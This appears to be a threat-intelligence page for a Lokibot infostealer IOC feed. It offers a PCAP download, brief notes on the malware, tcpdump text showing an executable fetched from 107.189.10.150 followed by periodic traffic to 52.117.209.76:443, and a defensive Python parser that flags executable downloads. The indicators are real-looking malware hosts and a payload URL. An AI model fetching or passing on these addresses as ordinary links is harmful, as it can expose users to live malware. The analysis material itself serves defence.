
Lokibot IOC Feed InfoStealer Trojan malware PCAP file download traffic sample


Download Attachments

  • 1 pcap 3609 (PCAP file, 898 KB) — Date added: February 11, 2020 9:30 am; Added by: admin; Downloads: 249

Latest indicators of compromise from our Lokibot IOC feed. Lokibot is an information-stealing (infostealer) trojan targeting users worldwide. It was designed primarily to perpetrate fraud and identity theft.

Lokibot was developed in 2015 to steal information from a variety of applications. Despite its age, this malware is still rather popular among cybercriminals.

Type: Stealer
Origin: ex-USSR territory
First seen: 3 May, 2015
Last seen: 11 February, 2020

Also known as: Loki, LokiPWS

2020-02-11 00:44:29.440705 IP 192.168.86.25.57639 > 107.189.10.150.80: Flags [P.], seq 1:517, ack 1, win 16450, length 516: HTTP: GET /E/3609779.exe HTTP/1.1
E..,+.@...@...V.k.
..'.P..../.".P.@BlZ..GET /E/3609779.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=113126-
Unless-Modified-Since: Sun, 09 Feb 2020 23:16:32 GMT
If-Range: "413b7-ac800-59e2cd034b0e8"
Host: 107.189.10.150
Connection: Keep-Alive

2020-02-11 00:44:29.548227 IP 107.189.10.150.80 > 192.168.86.25.57639: Flags [.], ack 517, win 490, length 0
E..(.D@.1..wk.
...V..P.'/.".....P...)e........
2020-02-11 00:44:29.554394 IP 107.189.10.150.80 > 192.168.86.25.57639: Flags [.], seq 1:1401, ack 517, win 490, length 1400: HTTP: HTTP/1.1 206 Partial Content
E....E@.1...k.
...V..P.'/.".....P.......HTTP/1.1 206 Partial Content
Date: Tue, 11 Feb 2020 05:45:18 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Sun, 09 Feb 2020 23:16:32 GMT
ETag: "413b7-ac800-59e2cd034b0e8"
Accept-Ranges: bytes
Content-Length: 593434
Content-Range: bytes 113126-706559/706560
Connection: close
Content-Type: application/octet-stream

2020-02-11 00:48:17.818353 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 192:216, ack 97, win 16351, length 24
E..@,/@.......V.4u.L....'G}..V.P.?..<...0...... ..."...........
2020-02-11 00:48:17.870347 IP 52.117.209.76.443 > 192.168.86.25.57611: Flags [P.], seq 97:121, ack 216, win 1025, length 24
E..@..@.l.D{4u.L..V.......V.'G.P........0......#... ...........
2020-02-11 00:48:22.872814 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 216:240, ack 121, win 16345, length 24
E..@,1@.......V.4u.L....'G...V.P.?......0?.........#...........
2020-02-11 00:49:12.871103 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 240:264, ack 121, win 16345, length 24
E..@,3@.......V.4u.L....'G...V.P.?......0......!...#...........
2020-02-11 00:49:12.920464 IP 52.117.209.76.443 > 192.168.86.25.57611: Flags [P.], seq 121:145, ack 264, win 1025, length 24
E..@..@.l.Dy4u.L..V.......V.'G.P........0......$...!...........
2020-02-11 00:49:17.925374 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 264:288, ack 145, win 16339, length 24
E..@,5@.......V.4u.L....'G...V.P.?......0?.........$...........
2020-02-11 00:50:07.923746 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 288:312, ack 145, win 16339, length 24
E..@,6@.......V.4u.L....'G...V.P.?......0......"...$...........
2020-02-11 00:50:07.975114 IP 52.117.209.76.443 > 192.168.86.25.57611: Flags [P.], seq 145:169, ack 312, win 1025, length 24
E..@..@.l.Dw4u.L..V.......V.'G.P....r...0......%..."...........
2020-02-11 00:50:12.978033 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 312:336, ack 169, win 16333, length 24
E..@,8@.......V.4u.L....'G...W.P.?......0?.........%...........
2020-02-11 00:51:02.976201 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 336:360, ack 169, win 16333, length 24
E..@,9@.......V.4u.L....'H...W.P.?..v...0......#...%...........
2020-02-11 00:51:03.032248 IP 52.117.209.76.443 > 192.168.86.25.57611: Flags [P.], seq 169:193, ack 360, win 1025, length 24
E..@..@.l.Du4u.L..V.......W.'H%P....*...0......&...#...........
2020-02-11 00:51:08.030703 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 360:384, ack 193, win 16327, length 24
E..@,;@.......V.4u.L....'H%..W%P.?..L...0?.........&...........
2020-02-11 00:51:58.028935 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 384:408, ack 193, win 16327, length 24
E..@,<@.......V.4u.L....'H=..W%P.?..4...0......$...&...........
2020-02-11 00:51:58.083799 IP 52.117.209.76.443 > 192.168.86.25.57611: Flags [P.], seq 193:217, ack 408, win 1025, length 24
E..@..@.l.Ds4u.L..V.......W%'HUP........0......'...$...........
2020-02-11 00:52:03.083250 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 408:432, ack 217, win 16321, length 24
E..@,>@.......V.4u.L....`'HU..W=P.?..
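The capture above is the kind of text an analyst gets from `tcpdump -A`, and the interesting part is easy to miss in the byte dump: a GET for an `.exe` against a bare-IP `Host`, resumed with a `Range` header, answered with `206 Partial Content` and `application/octet-stream`. The script below is an example added to this page (it is not the IOC feed's own tooling and not part of the PCAP). It parses tcpdump summary lines plus the HTTP header lines that follow them, pairs each executable-looking GET with the server's reply on the same flow, and summarises per-flow payload sizes and inter-packet gaps. The `SAMPLE` text is constructed from the summary and header lines shown above with the raw byte-dump lines left out (the parser ignores them anyway); the flagging heuristics (`EXEC_EXT`, bare-IP `Host`, presence of `Range`) are this example's own choices, not something the page states.

```python
"""Parse tcpdump -A summary text, flag executable downloads, summarise flows.

Example code added to this page; not part of the Lokibot IOC feed or its PCAP.
SAMPLE is constructed from the packet summary and HTTP header lines of the
capture shown on the page (byte-dump lines omitted)."""
import re
from collections import defaultdict
from datetime import datetime

# One tcpdump summary line: timestamp, 5-tuple, flags, payload length, optional HTTP line.
PKT_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) IP "
    r"(?P<src>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dst>\d+(?:\.\d+){3})\.(?P<dport>\d+): "
    r"Flags \[(?P<flags>[^\]]+)\].*?length (?P<length>\d+)"
    r"(?:: HTTP: (?P<http>.*))?$"
)
HDR_RE = re.compile(r"^([A-Za-z][A-Za-z0-9-]*): (.*)$")   # "Name: value" header lines
EXEC_EXT = (".exe", ".dll", ".scr", ".msi")                # heuristic, chosen for this example

SAMPLE = """\
2020-02-11 00:44:29.440705 IP 192.168.86.25.57639 > 107.189.10.150.80: Flags [P.], seq 1:517, ack 1, win 16450, length 516: HTTP: GET /E/3609779.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=113126-
Unless-Modified-Since: Sun, 09 Feb 2020 23:16:32 GMT
If-Range: "413b7-ac800-59e2cd034b0e8"
Host: 107.189.10.150
Connection: Keep-Alive
2020-02-11 00:44:29.548227 IP 107.189.10.150.80 > 192.168.86.25.57639: Flags [.], ack 517, win 490, length 0
2020-02-11 00:44:29.554394 IP 107.189.10.150.80 > 192.168.86.25.57639: Flags [.], seq 1:1401, ack 517, win 490, length 1400: HTTP: HTTP/1.1 206 Partial Content
Date: Tue, 11 Feb 2020 05:45:18 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Sun, 09 Feb 2020 23:16:32 GMT
ETag: "413b7-ac800-59e2cd034b0e8"
Accept-Ranges: bytes
Content-Length: 593434
Content-Range: bytes 113126-706559/706560
Connection: close
Content-Type: application/octet-stream
2020-02-11 00:48:17.818353 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 192:216, ack 97, win 16351, length 24
2020-02-11 00:48:17.870347 IP 52.117.209.76.443 > 192.168.86.25.57611: Flags [P.], seq 97:121, ack 216, win 1025, length 24
2020-02-11 00:48:22.872814 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 216:240, ack 121, win 16345, length 24
2020-02-11 00:49:12.871103 IP 192.168.86.25.57611 > 52.117.209.76.443: Flags [P.], seq 240:264, ack 121, win 16345, length 24
"""


def parse_capture(text):
    """Turn summary lines into packet dicts; header lines attach to the most recent packet."""
    packets = []
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if m:
            pkt = m.groupdict()
            pkt["ts"] = datetime.strptime(pkt["ts"], "%Y-%m-%d %H:%M:%S.%f")
            pkt["length"] = int(pkt["length"])
            pkt["headers"] = {}
            packets.append(pkt)
            continue
        h = HDR_RE.match(line)
        if h and packets:
            packets[-1]["headers"][h.group(1)] = h.group(2)
    return packets


def flow_key(pkt):
    """Direction-independent key so both halves of a conversation group together."""
    a = (pkt["src"], int(pkt["sport"]))
    b = (pkt["dst"], int(pkt["dport"]))
    return (a, b) if a < b else (b, a)


def find_executable_downloads(packets):
    """Pair each GET for an executable-looking URI with the server reply on the same flow."""
    findings = []
    for i, pkt in enumerate(packets):
        http = pkt.get("http") or ""
        if not http.startswith("GET "):
            continue
        uri = http.split()[1]
        if not uri.lower().endswith(EXEC_EXT):
            continue
        reasons = ["executable URI " + uri]
        if re.fullmatch(r"\d+(?:\.\d+){3}", pkt["headers"].get("Host", "")):
            reasons.append("bare-IP Host header")
        if "Range" in pkt["headers"]:
            reasons.append("resumed download via Range: " + pkt["headers"]["Range"])
        for reply in packets[i + 1:]:          # first HTTP response on the same flow
            rhttp = reply.get("http") or ""
            if flow_key(reply) == flow_key(pkt) and rhttp.startswith("HTTP/"):
                ctype = reply["headers"].get("Content-Type", "unknown")
                reasons.append(f"server answered {rhttp.split()[1]} with Content-Type {ctype}")
                break
        findings.append({"client": pkt["src"], "server": pkt["dst"], "uri": uri,
                         "user_agent": pkt["headers"].get("User-Agent", ""), "reasons": reasons})
    return findings


def flow_summary(packets):
    """Per flow: number of data-carrying packets, distinct payload sizes, gaps between them (s)."""
    flows = defaultdict(list)
    for pkt in packets:
        if pkt["length"] > 0:
            flows[flow_key(pkt)].append(pkt)
    summary = {}
    for key, pkts in flows.items():
        times = [p["ts"] for p in pkts]
        gaps = [round((b - a).total_seconds(), 3) for a, b in zip(times, times[1:])]
        summary[key] = {"packets": len(pkts),
                        "payload_sizes": sorted({p["length"] for p in pkts}),
                        "gaps": gaps}
    return summary


if __name__ == "__main__":
    pkts = parse_capture(SAMPLE)
    for f in find_executable_downloads(pkts):
        print(f"{f['client']} -> {f['server']} {f['uri']}: " + "; ".join(f["reasons"]))
    for key, stats in flow_summary(pkts).items():
        print(key, stats)
```

Run against a real capture with `tcpdump -A -nn -tttt -r sample.pcap | python3 this_script.py`-style plumbing (replace `SAMPLE` with `sys.stdin.read()`); the `-tttt` flag is what produces the date-prefixed timestamps the regex expects. The flow summary is deliberately neutral: it reports fixed-size, regularly spaced application-data records on the 443 flow without claiming what they are, which is the right starting point for deciding whether that traffic deserves a closer look.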

Written by: admin